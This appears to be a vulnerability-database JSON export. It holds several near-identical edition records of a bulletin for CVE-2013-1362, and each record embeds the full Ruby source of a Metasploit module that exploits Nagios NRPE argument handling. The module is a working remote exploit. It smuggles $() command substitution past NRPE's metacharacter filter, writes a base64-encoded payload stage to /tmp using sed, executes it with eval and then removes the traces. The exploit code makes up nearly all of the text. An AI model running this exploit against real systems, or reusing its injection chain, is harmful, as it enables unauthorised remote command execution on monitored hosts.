Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T15:39:13", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-17T23:39:31", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-17T23:39:31", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-18T01:38:05", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-18T01:38:05", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T01:37:52", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T01:37:52", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T05:38:35", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-11-20T05:38:35"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n 